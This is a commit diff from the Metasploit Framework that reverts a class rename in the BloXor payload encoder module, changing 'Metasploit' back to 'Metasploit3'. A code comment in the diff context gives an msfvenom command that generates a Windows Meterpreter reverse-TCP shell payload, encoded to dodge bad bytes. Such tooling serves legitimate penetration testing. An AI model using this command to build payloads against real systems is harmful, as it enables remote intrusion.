Revert "change remaining class names"

This reverts commit 62217fff2b.
bug/bundler_fix
Brent Cook 2016-03-07 13:19:42 -06:00
parent aa5b201427
commit 0e46cc0259
1 changed files with 1 additions and 1 deletions

View File

@ -24,7 +24,7 @@ require 'rex/encoder/bloxor/bloxor'
# >ruby msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.2.2 LHOST=192.168.2.1 LPORT=80 -a x86 -e x86/bloxor -b '\x00' -f raw | ndisasm -b32 -k 128,1 -
#
class Metasploit < Rex::Encoder::BloXor
class Metasploit3 < Rex::Encoder::BloXor
# Note: Currently set to manual, bump it up to automatically get selected by the framework.
# Note: BloXor by design is slow due to its exhaustive search for a solution.